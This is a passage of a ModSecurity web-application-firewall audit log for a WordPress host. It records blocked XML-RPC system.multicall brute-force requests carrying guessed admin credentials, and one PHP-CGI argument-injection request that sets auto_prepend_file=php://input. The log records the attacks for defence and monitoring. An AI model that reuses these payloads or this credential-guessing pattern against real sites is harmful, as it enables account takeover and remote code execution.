Safari/537.36 --b81c9c3d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@2015 --b81c9c3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b81c9c3d-E-- --b81c9c3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100731568690 5733 (- - -) Stopwatch2: 1749100731568690 5733; combined=4048, p1=543, p2=3332, p3=0, p4=0, p5=102, sr=101, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b81c9c3d-Z-- --74439873-A-- [05/Jun/2025:12:19:01 +0700] aEEoxeth7G2xELALzPYhNwAAANM 103.236.140.4 35658 103.236.140.4 8181 --74439873-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --74439873-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin#321 --74439873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74439873-E-- --74439873-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100741438751 5667 (- - -) Stopwatch2: 1749100741438751 5667; combined=4020, p1=527, p2=3320, p3=0, p4=0, p5=102, sr=98, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74439873-Z-- --c394777b-A-- [05/Jun/2025:12:19:19 +0700] aEEo1-th7G2xELALzPYhPAAAAMA 103.236.140.4 35676 103.236.140.4 8181 --c394777b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c394777b-C-- system.multicallmethodNamewp.getUsersBlogsparamstest12345678 --c394777b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c394777b-E-- --c394777b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100759712285 4799 (- - -) Stopwatch2: 1749100759712285 4799; combined=3682, p1=380, p2=3115, p3=0, p4=0, p5=107, sr=71, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c394777b-Z-- --af2b8031-A-- [05/Jun/2025:12:20:12 +0700] aEEpDOth7G2xELALzPYhSQAAANE 103.236.140.4 35706 103.236.140.4 8181 --af2b8031-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --af2b8031-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh102030 --af2b8031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af2b8031-E-- --af2b8031-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100812209738 5121 (- - -) Stopwatch2: 1749100812209738 5121; combined=3877, p1=415, p2=3265, p3=0, p4=0, p5=113, sr=83, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af2b8031-Z-- --35271a52-A-- [05/Jun/2025:12:20:22 +0700] aEEpFuth7G2xELALzPYhTwAAAME 103.236.140.4 35724 103.236.140.4 8181 --35271a52-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --35271a52-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin111 --35271a52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35271a52-E-- --35271a52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100822169317 5620 (- - -) Stopwatch2: 1749100822169317 5620; combined=4488, p1=503, p2=3752, p3=0, p4=0, p5=137, sr=93, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35271a52-Z-- --e4a46c30-A-- [05/Jun/2025:12:21:31 +0700] aEEpW3-K7ToMdu-YSIIkYQAAABY 103.236.140.4 35778 103.236.140.4 8181 --e4a46c30-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e4a46c30-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh++ --e4a46c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4a46c30-E-- --e4a46c30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100891347466 5283 (- - -) Stopwatch2: 1749100891347466 5283; combined=3830, p1=437, p2=3212, p3=0, p4=0, p5=107, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4a46c30-Z-- --52171d7b-A-- [05/Jun/2025:12:22:11 +0700] aEEpg-th7G2xELALzPYhawAAAMA 103.236.140.4 35798 103.236.140.4 8181 --52171d7b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --52171d7b-C-- --52171d7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52171d7b-E-- --52171d7b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100931678997 2910 (- - -) Stopwatch2: 1749100931678997 2910; combined=1831, p1=410, p2=1383, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52171d7b-Z-- --8b497f69-A-- [05/Jun/2025:12:22:15 +0700] aEEph-th7G2xELALzPYhbQAAAMY 103.236.140.4 35804 103.236.140.4 8181 --8b497f69-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8b497f69-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin777 --8b497f69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b497f69-E-- --8b497f69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100935252950 4570 (- - -) Stopwatch2: 1749100935252950 4570; combined=3587, p1=390, p2=3028, p3=0, p4=0, p5=98, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b497f69-Z-- --1f13b46a-A-- [05/Jun/2025:12:24:20 +0700] aEEqBOth7G2xELALzPYhfwAAAMM 103.236.140.4 35864 103.236.140.4 8181 --1f13b46a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1f13b46a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin@pass --1f13b46a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f13b46a-E-- --1f13b46a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101060297934 4523 (- - -) Stopwatch2: 1749101060297934 4523; combined=3507, p1=426, p2=2914, p3=0, p4=0, p5=97, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f13b46a-Z-- --0f5d6a0d-A-- [05/Jun/2025:12:24:44 +0700] aEEqHOth7G2xELALzPYhggAAAMY 103.236.140.4 35872 103.236.140.4 8181 --0f5d6a0d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.164.181.55 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.164.181.55 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0f5d6a0d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix2023 --0f5d6a0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f5d6a0d-E-- --0f5d6a0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.164.181.55 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101084800085 4874 (- - -) Stopwatch2: 1749101084800085 4874; combined=3603, p1=434, p2=3014, p3=0, p4=0, p5=92, sr=80, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f5d6a0d-Z-- --ad7a7846-A-- [05/Jun/2025:12:25:37 +0700] aEEqUeth7G2xELALzPYhiAAAAMw 103.236.140.4 35894 103.236.140.4 8181 --ad7a7846-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 493 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ad7a7846-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminrootr007pd8skdgSejrd --ad7a7846-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad7a7846-E-- --ad7a7846-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101137618072 5562 (- - -) Stopwatch2: 1749101137618072 5562; combined=4023, p1=508, p2=3345, p3=0, p4=0, p5=100, sr=91, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad7a7846-Z-- --5d252278-A-- [05/Jun/2025:12:25:50 +0700] aEEqXuth7G2xELALzPYhiQAAAM0 103.236.140.4 35898 103.236.140.4 8181 --5d252278-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 493 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5d252278-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminrootr007pd8skdgSejrd --5d252278-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d252278-E-- --5d252278-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101150522124 5827 (- - -) Stopwatch2: 1749101150522124 5827; combined=4206, p1=509, p2=3580, p3=0, p4=0, p5=69, sr=93, sw=48, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d252278-Z-- --787d491b-A-- [05/Jun/2025:12:26:22 +0700] aEEqfuth7G2xELALzPYhjgAAANE 103.236.140.4 35912 103.236.140.4 8181 --787d491b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --787d491b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin_1 --787d491b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --787d491b-E-- --787d491b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101182352468 4632 (- - -) Stopwatch2: 1749101182352468 4632; combined=3627, p1=364, p2=3074, p3=0, p4=0, p5=108, sr=77, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --787d491b-Z-- --bfd38150-A-- [05/Jun/2025:12:26:29 +0700] aEEqhVwdJdhOudw5hdzPGAAAAI4 103.236.140.4 35916 103.236.140.4 8181 --bfd38150-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bfd38150-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin_1 --bfd38150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfd38150-E-- --bfd38150-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101189884825 4798 (- - -) Stopwatch2: 1749101189884825 4798; combined=3772, p1=428, p2=3049, p3=0, p4=0, p5=161, sr=81, sw=134, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfd38150-Z-- --94260a60-A-- [05/Jun/2025:12:26:35 +0700] aEEqi-th7G2xELALzPYhkAAAANQ 103.236.140.4 35920 103.236.140.4 8181 --94260a60-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --94260a60-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin_1 --94260a60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94260a60-E-- --94260a60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101195410608 5188 (- - -) Stopwatch2: 1749101195410608 5188; combined=3615, p1=455, p2=3016, p3=0, p4=0, p5=85, sr=80, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94260a60-Z-- --0c8dbd22-A-- [05/Jun/2025:12:26:55 +0700] aEEqn-th7G2xELALzPYhkgAAANc 103.236.140.4 35924 103.236.140.4 8181 --0c8dbd22-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0c8dbd22-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2000 --0c8dbd22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c8dbd22-E-- --0c8dbd22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101215276170 5220 (- - -) Stopwatch2: 1749101215276170 5220; combined=3838, p1=443, p2=3226, p3=0, p4=0, p5=99, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c8dbd22-Z-- --c96c7b0c-A-- [05/Jun/2025:12:27:16 +0700] aEEqtOth7G2xELALzPYhmgAAAMQ 103.236.140.4 35940 103.236.140.4 8181 --c96c7b0c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: 